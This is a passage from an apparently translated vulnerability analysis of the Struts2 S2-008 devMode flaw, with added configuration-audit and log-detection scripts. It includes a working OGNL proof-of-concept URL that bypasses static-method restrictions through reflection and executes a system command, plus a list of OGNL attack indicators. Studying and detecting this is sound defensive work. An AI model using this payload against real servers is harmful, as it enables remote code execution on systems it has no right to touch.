Struts2: analysis of several recent vulnerabilities & stable exploitation payloads - vulnerability warning - the black bar safety net

ID MYHACK58:62201442321
Type myhack58
Reporter genxor@乌云知识库
Modified 2014-02-11T00:00:00



0x00 Background

There are plenty of articles online about exploiting Struts2, but comparatively few that trace how the vulnerabilities are actually triggered. Here I trace the two Struts2 vulnerabilities that have been most talked about recently and work out a payload that exploits them reliably.

0x01 S2-008

The Struts2 framework has a devMode that makes it easier for developers to debug an application. devMode is off by default; to use it you have to change the configuration by hand, either by setting devMode to true in struts.properties or by adding the following line to struts.xml:

<constant name="struts.devMode" value="true" />
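Since the whole issue hinges on devMode being switched on, the first thing a defender wants is a quick way to audit both places it can be enabled. The following is an added example, not code from the original article or from the Struts project: it checks a struts.xml constant and a struts.properties entry for struts.devMode=true. The configuration snippets it scans are constructed sample inputs.

```python
"""Audit Struts2 configuration for an enabled devMode.

Added example (not from the original article). Scans struts.xml constants
and struts.properties entries for struts.devMode=true, the setting that
activates DebuggingInterceptor. The sample configurations are constructed.
"""
import xml.etree.ElementTree as ET

DEVMODE_KEY = "struts.devMode"

# Constructed struts.xml that enables devMode
SAMPLE_STRUTS_XML_DEV = """<struts>
    <constant name="struts.devMode" value="true" />
    <package name="default" extends="struts-default">
        <action name="hello" class="example.HelloAction" />
    </package>
</struts>"""

# Constructed struts.xml with devMode explicitly off
SAMPLE_STRUTS_XML_PROD = SAMPLE_STRUTS_XML_DEV.replace('value="true"', 'value="false"')

# Constructed struts.properties that enables devMode
SAMPLE_PROPS_DEV = """# constructed struts.properties
struts.i18n.encoding=UTF-8
struts.devMode = true
"""


def devmode_in_xml(xml_text: str) -> bool:
    """True if struts.xml declares <constant name="struts.devMode" value="true"/>."""
    root = ET.fromstring(xml_text)
    for const in root.iter("constant"):
        if const.get("name", "").strip() == DEVMODE_KEY:
            return const.get("value", "").strip().lower() == "true"
    return False


def devmode_in_properties(props_text: str) -> bool:
    """True if struts.properties sets struts.devMode=true (the last value wins)."""
    enabled = False
    for raw in props_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "!")):
            continue
        # Java .properties files accept '=', ':' or whitespace as the separator
        for sep in ("=", ":"):
            if sep in line:
                key, _, value = line.partition(sep)
                break
        else:
            key, _, value = line.partition(" ")
        if key.strip() == DEVMODE_KEY:
            enabled = value.strip().lower() == "true"
    return enabled


def audit(xml_text: str, props_text: str) -> list:
    """Return a list of findings, one per configuration source that enables devMode."""
    findings = []
    if devmode_in_xml(xml_text):
        findings.append("struts.xml: struts.devMode=true")
    if devmode_in_properties(props_text):
        findings.append("struts.properties: struts.devMode=true")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_STRUTS_XML_DEV, SAMPLE_PROPS_DEV):
        print("FINDING:", finding)
```

Run it against the real struts.xml and struts.properties shipped inside a deployed WAR; any finding means DebuggingInterceptor is reachable in that deployment.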

devMode is actually implemented by DebuggingInterceptor.java in struts2-core.jar, at the bottom of the Struts2 stack, and that is where the vulnerability lives. I tested the debug=command branch of that logic; my POC is as follows:

http://localhost:8080/S2-016/hello.action?debug=command&expression=%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccess%2ctrue%29%2c%23a%3d@java.lang.Runtime@getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2c%23b%3dnew java.io.InputStreamReader%28%23a%29%2c%23c%3dnew java.io.BufferedReader%28%23b%29%2c%23d%3dnew char%5b50000%5d%2c%23c.read%28%23d%29%2c%23genxor%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2c%23genxor.println%28%23d%29%2c%23genxor.flush%28%29%2c%23genxor.close%28%29

First, devMode has several debug modes:

[Figure: the devMode debug modes]

Following the code of DebuggingInterceptor.java further, the problem is in the following logic:

[Figure: the vulnerable logic in DebuggingInterceptor.java]

Tracing the parameters, as shown in the figure:

[Figure: parameter tracing in the debugger]

Here you can see:

String cmd = getParameter(EXPRESSION_PARAM); ... writer.print(stack.findValue(cmd));

cmd is not processed in any way before it is handed straight to findValue(). findValue evaluates OGNL expressions (see the official documentation for details), so the expression parameter of the request is executed as OGNL.
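The trigger described above is simple to recognise in web server logs: a request with a devMode debug parameter, and for debug=command an expression value that contains OGNL rather than a plain property name. The following is an added example, not code from the original article or from the Struts project: it parses combined-format access log lines, percent-decodes the query string the way the framework does, and flags requests by the debug mode and the OGNL indicators named in this analysis. The log lines and severity labels are constructed for the example.

```python
"""Detect DebuggingInterceptor abuse in web access logs.

Added example (not from the original article). Flags requests that carry
the devMode 'debug' parameter and, for debug=command, inspects the
'expression' parameter for OGNL indicators discussed in the analysis.
The log lines and severity labels below are constructed.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: client ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# The debug modes handled by DebuggingInterceptor
DEBUG_MODES = {"xml", "console", "command", "browser"}

# Substrings showing the 'expression' value is an OGNL payload, not a field name
OGNL_INDICATORS = ("#", "@java.", "_memberAccess", "denyMethodExecution",
                   "getDeclaredField", "Runtime")

# Constructed sample log lines: a normal request, a debug=xml probe, and a
# debug=command request whose expression reaches into #_memberAccess
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Feb/2014:10:15:32 +0800] "GET /S2-016/hello.action?name=genxor HTTP/1.1" 200 512',
    '10.0.0.9 - - [11/Feb/2014:10:16:01 +0800] "GET /S2-016/hello.action?debug=xml HTTP/1.1" 200 2048',
    '10.0.0.9 - - [11/Feb/2014:10:16:07 +0800] "GET /S2-016/hello.action?debug=command'
    '&expression=%23_memberAccess.getClass%28%29 HTTP/1.1" 200 96',
]


def parse_line(line: str):
    """Parse one access log line into a dict, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs percent-decodes values, so %23context becomes #context
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def classify(rec: dict):
    """Return (severity, reason) for a parsed request, or None if it is not a devMode request."""
    debug = rec["params"].get("debug", [""])[0].lower()
    if debug not in DEBUG_MODES:
        return None
    if debug == "command":
        expr = rec["params"].get("expression", [""])[0]
        hits = [ind for ind in OGNL_INDICATORS if ind in expr]
        if hits:
            return ("high", f"debug=command with OGNL indicators {hits} in expression")
        return ("medium", "debug=command request (devMode expression evaluation)")
    return ("medium", f"debug={debug} request (devMode debugging interceptor exposed)")


def scan(lines) -> list:
    """Run every line through the parser and classifier; return a list of findings."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        verdict = classify(rec)
        if verdict:
            findings.append({"client": rec["client"], "path": rec["path"],
                             "severity": verdict[0], "reason": verdict[1]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity'].upper():6} {f['client']} {f['path']} - {f['reason']}")
```

Any debug= request against a production deployment is worth an alert on its own, because it proves devMode is on; the expression check only separates reconnaissance from an actual evaluation attempt.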

There is not much to say about the execution itself. The key to the payload is that it uses the Java reflection classes (which can reach private member variables) to bypass Struts2's rule restricting execution of Java static methods, which renders the earlier official Apache fix useless. Since Struts2 2.3.14.1, #_memberAccess["allowStaticMethodAccess"] can no longer be modified directly, yet calling a Java static method requires allowStaticMethodAccess to be true. Here the use of
